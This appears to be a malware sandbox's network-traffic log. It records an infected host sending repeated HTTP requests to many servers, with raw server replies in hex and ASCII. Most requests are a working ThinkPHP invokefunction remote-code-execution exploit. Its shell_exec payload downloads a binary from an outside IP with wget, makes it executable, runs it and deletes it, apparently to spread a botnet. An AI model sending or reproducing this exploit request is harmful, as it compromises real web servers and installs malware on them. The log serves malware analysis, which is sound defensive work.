                                                        Data Ascii: QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ
                                                        Feb 14, 2024 09:32:45.217998028 CET1124INData Raw: 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 74 68 2b 64 2b 70 68 63 69 38 46 4a 66 31 66 77 61 70 69
                                                        Data Ascii: K+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght
                                                        Feb 14, 2024 09:32:45.218035936 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <p class="reason-text">Your browser sent a request that this server could not understand:</p> </div> <section class="
                                                        Feb 14, 2024 09:32:45.218075037 CET1286INData Raw: 3e 3c 73 74 79 6c 65 3e 2e 73 74 30 7b 66 69 6c 6c 3a 23 66 37 66 37 66 37 7d 3c 2f 73 74 79 6c 65 3e 3c 63 69 72 63 6c 65 20 63 6c 61 73 73 3d 22 73 74 30 22 20 63 78 3d 22 32 38 33 2e 34 36 22 20 63 79 3d 22 32 38 33 2e 34 36 22 20 72 3d 22 32
                                                        Data Ascii: ><style>.st0{fill:#f7f7f7}</style><circle class="st0" cx="283.46" cy="283.46" r="274"></circle><circle cx="283.46" cy="283.46" r="244.97" fill="#29bcb8"></circle><path class="st0" d="M92.35 183.97c-83.03 138.89 19.34 322.2 190.74 322.2 123.34
                                                        Feb 14, 2024 09:32:45.218108892 CET208INData Raw: 39 20 35 2e 32 37 20 31 39 2e 35 39 20 33 2e 32 36 20 34 2e 38 33 20 31 30 2e 30 33 20 31 31 20 32 31 2e 38 32 20 31 31 20 31 31 2e 35 34 20 30 20 32 30 2e 33 31 2d 35 2e 39 20 32 35 2e 33 33 2d 31 35 2e 33 68 32 38 2e 38 33 7a 22 3e 3c 2f 70 61
                                                        Data Ascii: 9 5.27 19.59 3.26 4.83 10.03 11 21.82 11 11.54 0 20.31-5.9 25.33-15.3h28.83z"></path></svg> </div> </a> </div> </footer> </body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13192.168.2.145175895.100.116.12480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.012444973 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.226555109 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 65 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 35 36 35 26 23 34 36 3b 31 34 31 37 32 33 33 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2e8e2117&#46;1707899565&#46;14172331</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14192.168.2.144296888.221.195.19780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.021095991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15192.168.2.146078695.175.103.6680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.048691988 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.292121887 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        16192.168.2.143792095.100.79.21080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.409570932 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.610892057 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 63 37 61 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 35 36 35 26 23 34 36 3b 34 30 32 32 32 35 65 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;bc7a7b5c&#46;1707899565&#46;402225e3</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17192.168.2.145500695.111.248.6480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.430110931 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.640222073 CET404INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18192.168.2.144460295.100.112.9180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.432619095 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.645168066 CET478INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 256
                                                        Expires: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 61 38 65 32 31 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 35 36 35 26 23 34 36 3b 64 63 36 39 63 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;3a8e2117&#46;1707899565&#46;dc69c5</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        19192.168.2.145029095.215.57.15780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.533274889 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.778935909 CET333INHTTP/1.1 400 Bad Request
                                                        Server: Web server
                                                        Date: Wed, 14 Feb 2024 08:32:44 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 171
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        20192.168.2.144685895.0.234.4280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.536515951 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:53.809319973 CET63INHTTP/1.1 504 Gateway Timeout
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        21192.168.2.1436392112.49.54.19880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.566189051 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.935554028 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        22192.168.2.1446020112.133.238.25280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.573544979 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:45.948066950 CET632INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Server:
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-XSS-Protection: 1; mode=block
                                                        Strict-Transport-Security: max-age=15552000
                                                        X-UA-Compatible: IE=Edge
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 50 3e 0a 54 68 65 20 72 65 71 75 65 73 74 20 6c 69 6e 65 20 63 6f 6e 74 61 69 6e 65 64 20 69 6e 76 61 6c 69 64 20 63 68 61 72 61 63 74 65 72 73 20 66 6f 6c 6c 6f 77 69 6e 67 20 74 68 65 20 70 72 6f 74 6f 63 6f 6c 20 73 74 72 69 6e 67 2e 3c 50 3e 0a 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>Bad Request</H1>Your browser sent a request that this server could not understand.<P>The request line contained invalid characters following the protocol string.<P><P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        23192.168.2.1436402112.49.54.19880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.646754026 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:46.006134033 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:32:45 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        24192.168.2.144489695.57.64.18280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.706698895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:46.005513906 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:32:46.005826950 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        25192.168.2.1436416112.49.54.19880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:45.887655020 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:46.244923115 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:32:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        26192.168.2.143554688.99.102.15780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:32:46.463577986 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:32:46.666985035 CET323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:32:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
